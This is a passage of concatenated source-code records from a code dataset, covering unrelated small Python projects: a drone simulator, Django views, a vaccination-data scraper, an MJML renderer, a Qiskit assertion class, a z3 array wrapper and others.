guild.\n '''\n permissions = (\n (1 << 10) # 0x00000400 READ_MESSAGES\n + (1 << 11) # 0x00000800 SEND_MESSAGES\n + (1 << 14) # 0x00004000 EMBED_LINKS\n + (1 << 17) # 0x00020000 MENTION_EVERYONE\n + (1 << 18) # 0x00040000 USE_EXTERNAL_EMOJIS\n + (1 << 28) # 0x10000000 MANAGE_ROLES\n )\n return permissions\n\ndef get_invite_link(client_id):\n perm_value = get_required_bot_permissions_value()\n return 'https://discordapp.com/oauth2/authorize?&client_id=%s&scope=bot&permissions=%s' % (\n client_id, perm_value)\n\ndef log_traceback(logger):\n trace = traceback.extract_tb(sys.exc_info()[2])\n logger.error('Traceback: ')\n # Lines are four part tuples (file, linenum, funcname, text)\n for line in trace:\n logger.error('%s %d %s ', line[0], line[1], line[2])\n logger.error(' %s', line[3])\n","sub_path":"discord-bot/utils/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"52203415","text":"import numpy as np \nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.pylab as pylab\n\n\nclass Drone2D:\n def __init__(self, \n k_f = 0.1, # value of the thrust coefficient\n I_x = 0.1, # moment of inertia around the x-axis\n m = 1.0, # mass of the vehicle \n l = 0.5, # distance between the center of mass and the propeller axis\n \n ):\n \n self.k_f = k_f\n self.I_x = I_x\n self.l = l\n self.m = m\n self.omega_1 = 0.0\n self.omega_2 = 0.0\n self.g = 9.81\n \n #State variables. z, y, phi, z_dot, y_dot, phi_dot\n self.X = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n \n \n \n def get_thrust_and_moment(self):\n ''' Helper function which calculates and returns the collective thrust and moment about the X axis '''\n f_1 = self.k_f * self.omega_1 ** 2\n f_2 = self.k_f * self.omega_2 ** 2\n \n # c is often used to indicate \"collective thrust\" \n c = f_1 + f_2\n M_x = (f_1 - f_2) * self.l\n return c, M_x \n \n @property\n def z_dot_dot(self): #5\n '''Calculates vertical(z) acceleration of drone.'''\n c, M_x = self.get_thrust_and_moment()\n \n phi = self.X[2] #getting phi(horizontal rotation) from global state vector\n #Formula for vertical accn\n a_z = self.g - c * math.cos(phi) / self.m\n return a_z\n \n @property\n def y_dot_dot(self): #6\n ''' Calculates lateral(y) acceleration of drone'''\n c, M_x = self.get_thrust_and_moment()\n \n phi = self.X[2] #getting phi(horizontal rotation) from global state vector\n # print(phi)\n #Formula for lateral accn\n a_y = c * math.sin(phi) / self.m\n return a_y\n \n @property\n def phi_dot_dot(self): #7\n c, M_x = self.get_thrust_and_moment()\n \n #Formula for angular (horizontal) accn\n angular_acc = M_x / self.I_x\n return angular_acc\n \n \n # Advance state calculations\n def advance_state(self, dt): #4\n '''Advances the state of the drone forward by dt seconds.'''\n X_dot = np.array([\n self.X[3],\n self.X[4],\n self.X[5],\n self.z_dot_dot, #5\n self.y_dot_dot, #6\n self.phi_dot_dot #7\n ])\n \n # Change in state will be\n delta_x = X_dot * dt\n self.X = self.X + delta_x\n # print(self.X)\n return self.X\n \n '''\n This is a compact and effective approach\n current_state = [z, z_dot] (position, velocity)\n updated_state = [z_dot, z_dot_dot] (velocity, accn) Here velocity z_dot is taken from the current global velocity and accn is taken from the calculation of the drone's accn at that instant\n \n As per theory, \n we can get the position (changed at that instant) by integrating velocity w.r.t dt (at that instant): delta_z = z_dot * dt\n Update_Current_Position 
current.z = current.z + delta_z\n \n we can get the velocity (changed at that instant) by integrating accn w.r.t dt (at that instant): delta_z_dot = z_dot_dot * dt\n Update_Current_velocity current.z_dot = current.z_dot + delta_z_dot\n \n We can represent this in the form below\n [z, z_dot] = [z, z_dot] + [z_dot, z_dot_dot] * dt\n \n self.X = [z, z_dot], \n X_dot = [z_dot, z_dot_dot], \n delta_x = X_dot * dt \n \n self.X (updated current state) = self.X (current state) + delta_x (change in state at that instant) \n '''\n \n \n def set_rotors_angular_velocities(self,linear_acc):\n \"\"\"\n Objective: Need to track the desired linear_acc without considering the horizontal angle (phi) [this horizontal angle is already handled when decomposing the thrust w.r.t. the body frame]\n Sets self.omega_1 and self.omega_2 to realize the desired linear_acc. (Meaning w1^2 and w2^2 combined need to achieve the linear accn)\n Note that this is for vertical motion ONLY (so there is no need to vary the w^2 values of the rotors to perform pitching or rotational acceleration, hence w^2 + w^2 = 2*w^2). \n It is assumed that rotational acceleration and phi are zero. (Because here we are just tracking linear accn; the rotation of the body frame / horizontal_rotation(phi) is already integrated directly when decomposing the thrusts)\n \n Deriving omega,\n F = kf * w^2\n w^2 = F/kf\n F = m*a\n Fnet = Fdown - Fup\n = m * g - m * linear_acc\n F = m(g - linear_acc)\n \n Therefore the total w^2 = m(g - linear_acc)/kf\n Considering 2 motors tracking vertical motion without any difference in motor speed, w1^2 = w2^2, so the total is w1^2 + w2^2 = 2*w^2 \n Finally w = sqrt(m(g - linear_acc)/(2*kf))\n \"\"\"\n \n omega = math.sqrt(self.m * (-linear_acc + self.g) /(2 * self.k_f))\n\n self.omega_1 = omega\n self.omega_2 = omega\n\n return self.omega_1, self.omega_2 #2\n \n \n#Testing advance_state and set_rotors\n# Start by generating a target trajectory and target vertical acceleration\ntotal_time = 3.0\ndt = 0.002\nt = np.linspace(0.0, total_time, int(total_time/dt))\n\nz_path= 0.5*np.cos(2*t)-0.5 # Trajectory path; the line below is the target accn needed to track this trajectory\nz_dot_dot_path= -2.0*np.cos(2*t) # Based on this target vertical accn, the motors generate the omegas and advance_state() updates the drone position\n\n\n# Try to follow the trajectory. 
\n# Store the state history as we go.\n\ndrone = Drone2D()\ndrone_state_history = drone.X\nfor i in range(t.shape[0]-1):\n \n # setting the propeller velocities \n drone.set_rotors_angular_velocities(z_dot_dot_path[i]) #1\n \n # calculating the new state vector \n drone_state = drone.advance_state(dt) #3\n \n # generate a history of vertical positions for drone and arrange using vstack\n drone_state_history = np.vstack((drone_state_history, drone_state)) #8\n \n \n\n#Ploting\nplt.plot(t,z_path,linestyle='-',marker='o',color='red')\nplt.plot(t,drone_state_history[:,0],linestyle='-',color='blue')\nplt.grid()\nplt.title('Change in height').set_fontsize(20)\nplt.xlabel('$t$ [sec]').set_fontsize(20)\nplt.ylabel('$z-z_0$ [$m$]').set_fontsize(20)\nplt.xticks(fontsize = 14)\nplt.yticks(fontsize = 14)\nplt.legend(['planned path','executed path'],fontsize = 18)\nplt.show()","sub_path":"P3 - Controls/scripts/controllingDrone_2D.py","file_name":"controllingDrone_2D.py","file_ext":"py","file_size_in_byte":6743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"47303417","text":"from typing import (\n TYPE_CHECKING,\n Any,\n Dict,\n Optional,\n Sequence,\n Union,\n)\n\nfrom web3.exceptions import (\n ValidationError,\n)\n\nif TYPE_CHECKING:\n from web3 import Web3 # noqa: F401\n from web3.module import Module # noqa: F401\n\n\ndef attach_modules(\n parent_module: Union[\"Web3\", \"Module\"],\n module_definitions: Dict[str, Sequence[Any]],\n w3: Optional[Union[\"Web3\", \"Module\"]] = None\n) -> None:\n for module_name, module_info in module_definitions.items():\n module_class = module_info[0]\n\n if hasattr(parent_module, module_name):\n raise AttributeError(\n f\"Cannot set {parent_module} module named '{module_name}'. 
The web3 object \"\n \"already has an attribute with that name\"\n )\n\n if w3 is None:\n setattr(parent_module, module_name, module_class(parent_module))\n w3 = parent_module\n else:\n setattr(parent_module, module_name, module_class(w3))\n\n if len(module_info) == 2:\n submodule_definitions = module_info[1]\n module = getattr(parent_module, module_name)\n attach_modules(module, submodule_definitions, w3)\n elif len(module_info) != 1:\n raise ValidationError(\"Module definitions can only have 1 or 2 elements.\")\n","sub_path":"env/lib/python3.8/site-packages/web3/_utils/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"62003381","text":"import json\nimport requests\nimport vaxutils\nimport pandas as pd\n\nfirstDose_source = \"https://services-eu1.arcgis.com/z6bHNio59iTqqSUY/arcgis/rest/services/Covid19_Vaccine_Administration_Hosted_View/FeatureServer/0/query?f=json&where=1%3D1&outFields=*&returnGeometry=false&outStatistics=%5B%7B%22onStatisticField%22%3A%22firstDose%22%2C%22outStatisticFieldName%22%3A%22firstDose_max%22%2C%22statisticType%22%3A%22max%22%7D%5D\"\nsecondDose_source = \"https://services-eu1.arcgis.com/z6bHNio59iTqqSUY/arcgis/rest/services/Covid19_Vaccine_Administration_Hosted_View/FeatureServer/0/query?f=json&where=1%3D1&outFields=*&returnGeometry=false&outStatistics=%5B%7B%22onStatisticField%22%3A%22secondDose%22%2C%22outStatisticFieldName%22%3A%22secondDose_max%22%2C%22statisticType%22%3A%22max%22%7D%5D\"\ndate_source = \"https://services-eu1.arcgis.com/z6bHNio59iTqqSUY/arcgis/rest/services/Covid19_Vaccine_Administration_Hosted_View/FeatureServer/0/query?f=json&where=1%3D1&outFields=*&returnGeometry=false&outStatistics=%5B%7B%22onStatisticField%22%3A%22relDate%22%2C%22outStatisticFieldName%22%3A%22relDate_max%22%2C%22statisticType%22%3A%22max%22%7D%5D\"\n\n\ndef read() -> pd.Series:\n return parse_data()\n\n\ndef parse_data() -> pd.Series:\n keys = (\"date\", \"people_vaccinated\", \"people_fully_vaccinated\")\n values = (parse_date(), parse_people_vaccinated(), parse_people_fully_vaccinated())\n data = dict(zip(keys, values))\n return pd.Series(data=data)\n\n\ndef parse_date() -> str:\n data = json.loads(requests.get(date_source).content)[\"features\"][0][\"attributes\"]\n date = data[\"relDate_max\"]\n date = str(pd.to_datetime(date, unit=\"ms\").date())\n return date\n\n\ndef parse_people_vaccinated() -> int:\n data = json.loads(requests.get(firstDose_source).content)[\"features\"][0][\"attributes\"]\n people_vaccinated = int(data[\"firstDose_max\"])\n return people_vaccinated\n\n\ndef parse_people_fully_vaccinated() -> int:\n data = json.loads(requests.get(secondDose_source).content)[\"features\"][0][\"attributes\"]\n people_fully_vaccinated = int(data[\"secondDose_max\"])\n return people_fully_vaccinated\n\n\ndef add_totals(input: pd.Series) -> pd.Series:\n total_vaccinations = input['people_vaccinated'] + input['people_fully_vaccinated']\n return vaxutils.enrich_data(input, 'total_vaccinations', total_vaccinations)\n\n\ndef enrich_location(input: pd.Series) -> pd.Series:\n return vaxutils.enrich_data(input, 'location', \"Ireland\")\n\n\ndef enrich_vaccine(input: pd.Series) -> pd.Series:\n return vaxutils.enrich_data(input, 'vaccine', \"Moderna, Oxford/AstraZeneca, Pfizer/BioNTech\")\n\n\ndef enrich_source(input: pd.Series) -> pd.Series:\n return vaxutils.enrich_data(input, 'source_url', 
\"https://covid19ireland-geohive.hub.arcgis.com/\")\n\n\ndef pipeline(input: pd.Series) -> pd.Series:\n return (\n input.pipe(add_totals)\n .pipe(enrich_location)\n .pipe(enrich_vaccine)\n .pipe(enrich_source)\n )\n\n\ndef main():\n data = read().pipe(pipeline)\n vaxutils.increment(\n location=data['location'],\n total_vaccinations=data['total_vaccinations'],\n people_vaccinated=data['people_vaccinated'],\n people_fully_vaccinated=data['people_fully_vaccinated'],\n date=data['date'],\n source_url=data['source_url'],\n vaccine=data['vaccine']\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/scripts/vaccinations/automations/incremental/ireland.py","file_name":"ireland.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"157597494","text":"class Solution:\r\n def intToRoman(self, num):\r\n \"\"\"\r\n 整数转罗马数字\r\n :param num: 给定整数\r\n :return: 罗马数字字符串\r\n \"\"\"\r\n # num在1-3999内\r\n if num < 1 or num > 3999:\r\n return None\r\n\r\n nums_map = {1000: \"M\", 900: \"CM\", 500: \"D\", 400: \"CD\", 100: \"C\", 90: \"XC\", 50: \"L\", 40: \"XL\", 10: \"X\", 9: \"IX\",\r\n 5: \"V\", 4: \"IV\", 1: \"I\"}\r\n\r\n answer = \"\"\r\n\r\n for k, v in nums_map.items():\r\n count = num // k\r\n num %= k\r\n for i in range(0, count):\r\n answer += v\r\n\r\n return answer\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(Solution().intToRoman(2220))\r\n","sub_path":"LeetCode_Python/Test_12_intToRoman.py","file_name":"Test_12_intToRoman.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"490284036","text":"import os\nimport re\n\nfrom django.core.files.base import ContentFile\nfrom django.core.files.storage import default_storage\nfrom markdown2 import Markdown\n\n\ndef list_entries():\n \"\"\"\n Returns a list of all names of encyclopedia entries.\n \"\"\"\n _, filenames = default_storage.listdir(\"entries\")\n return list(sorted(re.sub(r\"\\.md$\", \"\", filename)\n for filename in filenames if filename.endswith(\".md\")))\n\n\ndef edit_entry(title, content):\n \"\"\"\n Edit the contents of an entry.\n \"\"\"\n with open(f\"entries/{title}.md\", \"w\") as f:\n f.write(content)\n\n\ndef get_entry(title):\n \"\"\"\n Retrieves an encyclopedia entry by its title. If no such\n entry exists, the function returns None.\n \"\"\"\n try:\n f = default_storage.open(f\"entries/{title}.md\")\n return f.read().decode(\"utf-8\")\n except FileNotFoundError:\n return None\n\n\ndef convert_md(mdFile):\n \"\"\" \n Read contents of Markdown file and return HTML. \n \"\"\"\n with open(f\"./entries/{mdFile}.md\") as f:\n contents = f.read()\n markdowner = Markdown()\n ourHtml = markdowner.convert(contents)\n return ourHtml\n\n\ndef get_title(mdFile):\n base = os.path.basename(f\"./entries/{mdFile}.md\")\n title = os.path.splitext(base)[0]\n return title\n\n\ndef read_contents(mdFile):\n \"\"\" \n Return the contents of a Markdown file. \n \"\"\"\n with open(f\"./entries/{mdFile}.md\") as f:\n contents = f.read()\n return contents\n\n\ndef create_entry(title, content):\n \"\"\"\n Allow creation of an entry. 
If page already exists,\n return an error.\n \"\"\"\n filename = f\"entries/{title}.md\"\n if default_storage.exists(filename):\n return False\n else:\n default_storage.save(filename, ContentFile(content))\n return True\n","sub_path":"encyclopedia/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"390354883","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nimport logging\n\nfrom openerp import api, fields, models, _\nfrom openerp.exceptions import UserError, ValidationError\n\n_logger = logging.getLogger(__name__)\n\n\nclass Partner(models.Model):\n _inherit = 'res.partner'\n\n ''' Add field district in partner\n '''\n\n district_id = fields.Many2one('res.country.district',\n string='District')\n\n def _display_address(self, cr, uid, address, without_company=False, context=None):\n # Adding district and change address format\n address_format = address.country_id.address_format or \\\n \"%(street)s\\n%(street2)s\\n%(city)s %(state_code)s %(zip)s\\n%(district_name)s\\n%(country_name)s\"\n args = {\n 'state_code': address.state_id.code or '',\n 'state_name': address.state_id.name or '',\n 'district_code': address.district_id.code or '',\n 'district_name': address.district_id.name or '',\n 'country_code': address.country_id.code or '',\n 'country_name': address.country_id.name or '',\n 'company_name': address.parent_name or '',\n }\n for field in self._address_fields(cr, uid, context=context):\n args[field] = getattr(address, field) or ''\n if without_company:\n args['company_name'] = ''\n elif address.parent_id:\n address_format = '%(company_name)s\\n' + address_format\n return address_format % args\n","sub_path":"fal_delivery_with_district/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"120550890","text":"from django.shortcuts import render\nfrom .models import Gallery\nfrom .models import Courses\nfrom .models import Teachers\nfrom django.core.mail import send_mail\n# Create your views here.\ndef home(request):\n gal=Gallery.objects.all()\n return render(request,'index.html')\n\ndef about(request):\n return render(request,'about.html')\n\ndef course(request):\n cou=Courses.objects.all()\n teach=Teachers.objects.all()\n return render(request,'course.html',{'cou':cou,'teach':teach})\n\ndef gallery(request):\n gal=Gallery.objects.all()\n\n return render(request,'gallery.html',{'gal':gal})\n\ndef contact(request):\n if request.method=='POST':\n name=request.POST.get('yourName')\n\n phone_no=str(request.POST.get('phone'))\n email_id=request.POST.get('email')\n course=request.POST.get('subject')\n Message=request.POST.get('Message')\n\n send_mail(\n phone_no,\n course,\n Message,\n ['rv432222@gmail.com'],\n fail_silently=False,\n )\n # print(name+phone_no+email_id+course+Message)\n return render(request,'contact.html')\n","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"1368211","text":"import socket\nimport random\nimport subprocess\nfrom django.utils.encoding import force_str\nfrom . 
import settings as mjml_settings\n\n\ndef _mjml_render_by_cmd(mjml_code):\n cmd_args = mjml_settings.MJML_EXEC_CMD\n if not isinstance(cmd_args, list):\n cmd_args = [cmd_args]\n cmd_args.extend(['-i', '-s'])\n\n try:\n p = subprocess.Popen(cmd_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n html = force_str(p.communicate(mjml_code.encode('utf8'))[0])\n except (IOError, OSError) as e:\n raise RuntimeError(\n 'Problem running command \"{}\"\\n'.format(' '.join(cmd_args)) +\n '{}\\n'.format(e) +\n 'Check that mjml is installed and has execute permissions.\\n' +\n 'See https://github.com/mjmlio/mjml#installation'\n )\n return html\n\n\ndef _mjml_render_by_tcpserver(mjml_code):\n if len(mjml_settings.MJML_TCPSERVERS) > 1:\n servers = list(mjml_settings.MJML_TCPSERVERS)[:]\n random.shuffle(servers)\n else:\n servers = mjml_settings.MJML_TCPSERVERS\n\n mjml_code = mjml_code.encode('utf8') or b' '\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n for host, port in servers:\n try:\n s.connect((host, port))\n except socket.error:\n continue\n try:\n s.send(mjml_code)\n ok = force_str(s.recv(1)) == '0'\n result_len = int(force_str(s.recv(9)))\n result = force_str(s.recv(result_len))\n if ok:\n return result\n else:\n raise RuntimeError('MJML compile error (via MJML TCP server): {}'.format(result))\n finally:\n s.close()\n raise RuntimeError('MJML compile error (via MJML TCP server): no working server')\n\n\ndef mjml_render(mjml_code):\n if mjml_code == '':\n return mjml_code\n\n if mjml_settings.MJML_BACKEND_MODE == 'cmd':\n return _mjml_render_by_cmd(mjml_code)\n elif mjml_settings.MJML_BACKEND_MODE == 'tcpserver':\n return _mjml_render_by_tcpserver(mjml_code)\n raise RuntimeError('Invalid settings.MJML_BACKEND_MODE \"{}\"'.format(mjml_settings.MJML_BACKEND_MODE))\n","sub_path":"mjml/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"239417896","text":"# 1. Analyze the speed and complexity of any one of the algorithms developed\n# as part of the homework for the first three lessons.\n\n\n# Task:\n# 5. 
Find the maximum negative element in the array.\n# Print its value and position in the array.\nimport random\nimport timeit\n\n# First implementation of the function\n# __________________________________\n\ndef find_max_neg_fst(array):\n neg_array = []\n for i in array:\n if i < 0:\n neg_array.append(i)\n\n max_neg = neg_array[0]\n for i in neg_array:\n if i > max_neg:\n max_neg = i\n\n max_neg_idx = array.index(max_neg)\n return max_neg, max_neg_idx\n\n# Second implementation of the function\n# __________________________________\n\ndef find_max_neg_snd(array):\n max_neg = None\n for i in array:\n if i < 0 and (max_neg is None or i > max_neg):\n max_neg = i\n\n max_neg_idx = array.index(max_neg)\n return max_neg, max_neg_idx\n\n# Third implementation of the function\n# __________________________________\n\ndef find_max_neg_trd(array):\n neg_array = []\n for i in array:\n if i < 0:\n neg_array.append(i)\n max_neg = max(neg_array)\n max_neg_idx = array.index(max_neg)\n return max_neg, max_neg_idx\n\n# Comparison of the different implementations of the function\n\nNUMBER_EXECUTIONS = 1\narray = [random.randint(-100, 100) for i in range(20)]\ntime1 = timeit.timeit(f'find_max_neg_fst({array})',\n setup='from __main__ import find_max_neg_fst',\n number=NUMBER_EXECUTIONS)\ntime2 = timeit.timeit(f'find_max_neg_snd({array})',\n setup='from __main__ import find_max_neg_snd',\n number=NUMBER_EXECUTIONS)\ntime3 = timeit.timeit(f'find_max_neg_trd({array})',\n setup='from __main__ import find_max_neg_trd',\n number=NUMBER_EXECUTIONS)\n\nprint(f'The second implementation took {round(time2 / time1, 2)}x the time of the first')\nprint(f'The third implementation took {round(time3 / time2, 2)}x the time of the second')\n\n# The second implementation took 0.53x the time of the first (i.e. it was faster)\n# The third implementation took 1.56x the time of the second (i.e. it was slower)","sub_path":"lesson4/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"300480375","text":"f = open(\"8.txt\",\"r\")\nlista = f.read()\nf.close()\nw = 25\nh = 6\nlayers = []\nzeri = []\nuni = []\ndue = []\nfor i in range(0, len(lista), w*h):\n layers.append(lista[i:i+w*h])\nfor layer in layers:\n temp = 0\n asd = 0\n coso = 0\n for j in range(w*h):\n if int(layer[j]) == 0:\n temp += 1\n if int(layer[j]) == 1:\n asd += 1\n if int(layer[j]) == 2:\n coso += 1\n zeri.append(temp)\n uni.append(asd)\n due.append(coso)\nminimo = 0\nfor i in range(len(zeri)):\n if zeri[i] < zeri[minimo]:\n minimo = i\nprint(\"solution 1:\", uni[minimo] * due[minimo])\nfinal = []\nfor i in range(len(layers[0])):\n pixel = int(layers[0][i]) #2 transparent, 1 white, 0 black\n profondita = 0\n while pixel == 2:\n profondita += 1\n pixel = int(layers[profondita][i])\n final.append(pixel)\nprint(\"solution 2:\")\nuni[0] = 0\ndue[0] = 0\nfor i in range(h):\n for j in range(i*w, i*w + w):\n print(final[j], end=\"\")\n print()\n","sub_path":"8/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"411611906","text":"# -*- coding: utf-8 -*-\n\n#client part to access raspberry pi cameras in remote LAN\n#use this API from web server app\n\nimport xmlrpclib\nimport os, sys\nimport errno\n\n#settings shared with django app cams\n#make separate settings if you use this with non-django app\nfrom cams.cam_settings import *\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass PiManagerError(Exception):\n def 
__init__(self, *args):\n self.args = args\n\n def __repr__(self):\n return \"PiManagerError \" + self.args\n\n def __str__(self):\n return ' '.join(self.args)\n\n\nclass PiProxy():\n def __init__(self):\n self.proxy = xmlrpclib.ServerProxy(\"http://localhost:2001/\")\n\n def take_picture(self, pi, size = ('512', '512'), use_old=False, archive=False):\n pict = os.path.join(IMAGE_ROOT, \"pict_\" + pi + \".jpg\")\n try:\n if not settings.DEBUG:\n os.makedirs(IMAGE_ROOT)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n logger.error('dir creation failed, dir: %s' % dir)\n return False\n logger.debug('in take picture: %s' % pict)\n\n self.proxy.take_picture(pi, size[0], size[1], pict, use_old, archive)\n data = \"\"\n try:\n with open(pict, 'rb') as f:\n #return _read_in_chunks(f)\n return f.read()\n except IOError:\n logger.error('Failed to open image file %s' % pict)\n return \"\"\n\n def reset_video_timer(self, pi):\n self.proxy.reset_video_timer(pi)\n\n def start_hls_video(self, pi, h='405', w='720'):\n dir = os.path.join(IMAGE_ROOT, pi)\n logger.debug('dir is: %s' % dir)\n try:\n os.makedirs(dir)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n logger.error('dir creation failed, dir: %s' % dir)\n return False\n return self.proxy.start_hls_video(pi, h, w, dir)\n","sub_path":"piclient.py","file_name":"piclient.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"362316563","text":"# -*- coding: utf-8 -*-\n\n# This code is part of Qiskit.\n#\n# (C) Copyright IBM 2019.\n#\n# This code is licensed under the Apache License, Version 2.0. You may\n# obtain a copy of this license in the LICENSE.txt file in the root directory\n# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.\n#\n# Any modifications or derivative works of this code must retain this\n# copyright notice, and modified files need to carry a notice indicating\n# that they have been altered from the originals.\n\n\"\"\"\nAssertion of product states.\n\"\"\"\nimport numpy as np\nfrom scipy.stats import chi2_contingency\nfrom qiskit.assertions.asserts import Asserts\nfrom qiskit.circuit.quantumcircuit import QuantumCircuit\nfrom qiskit.circuit.quantumcircuit import Register\n\n\nclass AssertProduct(Asserts):\n \"\"\"\n A measurement instruction that additionally performs statistical tests on the measurement\n outcomes to assert whether the state is a product state or not.\n \"\"\"\n def __init__(self, qubit0, cbit0, qubit1, cbit1, pcrit, negate):\n \"\"\"\n Constructor for AssertProduct\n\n Args:\n qubit0(QuantumRegister or list): quantum register\n cbit0(ClassicalRegister or list): classical register\n qubit1(QuantumRegister or list): quantum register\n cbit1(ClassicalRegister or list): classical register\n pcrit(float): the critical p-value\n negate(bool): True if assertion passed is negation of statistical test passed\n \"\"\"\n self._qubit0 = self._syntax_for_measure(qubit0)\n self._cbit0 = self._syntax_for_measure(cbit0)\n self._qubit1 = self._syntax_for_measure(qubit1)\n self._cbit1 = self._syntax_for_measure(cbit1)\n type_str = \"Not Product\" if negate else \"Product\"\n qubit0 = list(self._qubit0) if isinstance(self._qubit0, Register) else self._qubit0\n qubit1 = list(self._qubit1) if isinstance(self._qubit1, Register) else self._qubit1\n cbit0 = list(self._cbit0) if isinstance(self._cbit0, Register) else self._cbit0\n cbit1 = list(self._cbit1) if isinstance(self._cbit1, 
Register) else self._cbit1\n super().__init__(qubit0 + qubit1, cbit0 + cbit1, pcrit, negate, type_str)\n\n def stat_test(self, counts):\n \"\"\"\n Performs a chi-squared contingency test on the experimental outcomes.\n Internally, constructs a contingency table from the experimental counts.\n\n\n Args:\n counts(dictionary): result.get_counts(experiment)\n\n Returns:\n tuple: tuple containing:\n\n chisq(float): the chi-square value\n\n pval(float): the p-value\n\n passed(bool): if the test passed\n \"\"\"\n q0len = len(self._qubit0)\n q1len = len(self._qubit1)\n cont_table = np.ones((2 ** q0len, 2 ** q1len))\n\n for (key, value) in counts.items():\n key_rev = key[::-1]\n q0index = int(key_rev[:q0len], 2)\n q1index = int(key_rev[q0len:], 2)\n cont_table[q0index][q1index] = value\n\n chisq, pval, _, _ = chi2_contingency(cont_table)\n passed = bool(pval >= self._pcrit)\n return (chisq, pval, passed)\n\n\ndef get_breakpoint_product(self, qubit0, cbit0, qubit1, cbit1, pcrit=0.05):\n \"\"\"\n Creates a breakpoint, which is a renamed deep copy of the QuantumCircuit, and creates and\n appends an AssertProduct instruction to its end. It tests whether qubit0 and qubit1, measured\n to cbit0 and cbit1, have any entanglement between them. If the statistical test passes, the\n assertion passes; if the test fails, the assertion fails.\n\n Args:\n qubit0(QuantumRegister or list): quantum register\n cbit0(ClassicalRegister or list): classical register\n qubit1(QuantumRegister or list): quantum register\n cbit1(ClassicalRegister or list): classical register\n pcrit(float): critical p-value for the hypothesis test\n\n Returns:\n QuantumCircuit: copy of quantum circuit at the assert point\n \"\"\"\n clone = self.copy(Asserts._new_breakpoint_name())\n assertion = AssertProduct(qubit0, cbit0, qubit1, cbit1, pcrit, False)\n clone.append(assertion, [assertion._qubit], [assertion._cbit])\n return clone\n\n\nQuantumCircuit.get_breakpoint_product = get_breakpoint_product\n\n\ndef get_breakpoint_not_product(self, qubit0, cbit0, qubit1, cbit1, pcrit=0.05):\n \"\"\"\n Creates a breakpoint, which is a renamed deep copy of the QuantumCircuit, and creates and\n appends an AssertProduct instruction to its end. It tests whether qubit0 and qubit1, measured\n to cbit0 and cbit1, have any entanglement between them. If the statistical test passes, the\n assertion fails; if the test fails, the assertion passes.\n\n Args:\n qubit0(QuantumRegister or list): quantum register\n cbit0(ClassicalRegister or list): classical register\n qubit1(QuantumRegister or list): quantum register\n cbit1(ClassicalRegister or list): classical register\n pcrit(float): critical p-value for the hypothesis test\n\n Returns:\n QuantumCircuit: copy of quantum circuit at the assert point\n \"\"\"\n clone = self.copy(Asserts._new_breakpoint_name())\n assertion = AssertProduct(qubit0, cbit0, qubit1, cbit1, pcrit, True)\n clone.append(assertion, [assertion._qubit], [assertion._cbit])\n return clone\n\n\nQuantumCircuit.get_breakpoint_not_product = get_breakpoint_not_product\n","sub_path":"qiskit/assertions/assertproduct.py","file_name":"assertproduct.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"317613280","text":"import z3\n\nfrom copy import deepcopy\nfrom .bitvector import BV, BVV, BVExpr\nfrom .bool_expr import Bool, BoolV\n\n\nclass BVArray(object):\n \"\"\" Wrapper of z3's Array. 
Beware: this is not immutable, unlike z3 \"\"\"\n\n def __init__(self, name: str, index_width: int, value_width: int):\n assert index_width > 0\n assert value_width > 0\n\n self.name = name\n self.index_width = index_width\n self.value_width = value_width\n self._conc_store = {}\n self._z3obj = None\n self._z3objConcCache = None\n\n def __str__(self):\n return \"<BVArray [BV{ind} -> BV{val}] {name}>\".format(\n name=self.name,\n ind=self.index_width,\n val=self.value_width\n )\n\n def __repr__(self):\n return self.__str__()\n\n def simplify(self):\n if self._z3obj is None:\n return\n self._z3obj = z3.simplify(self._z3obj)\n\n @property\n def z3obj(self):\n if self._z3obj is not None:\n # symbolic mode\n return self._z3obj\n\n # concrete mode\n if self._z3objConcCache is not None:\n return self._z3objConcCache\n res = z3.Array(\n self.name,\n z3.BitVecSort(self.index_width),\n z3.BitVecSort(self.value_width)\n )\n for index in self._conc_store:\n res = z3.Store(\n res,\n z3.BitVecVal(index, self.index_width),\n 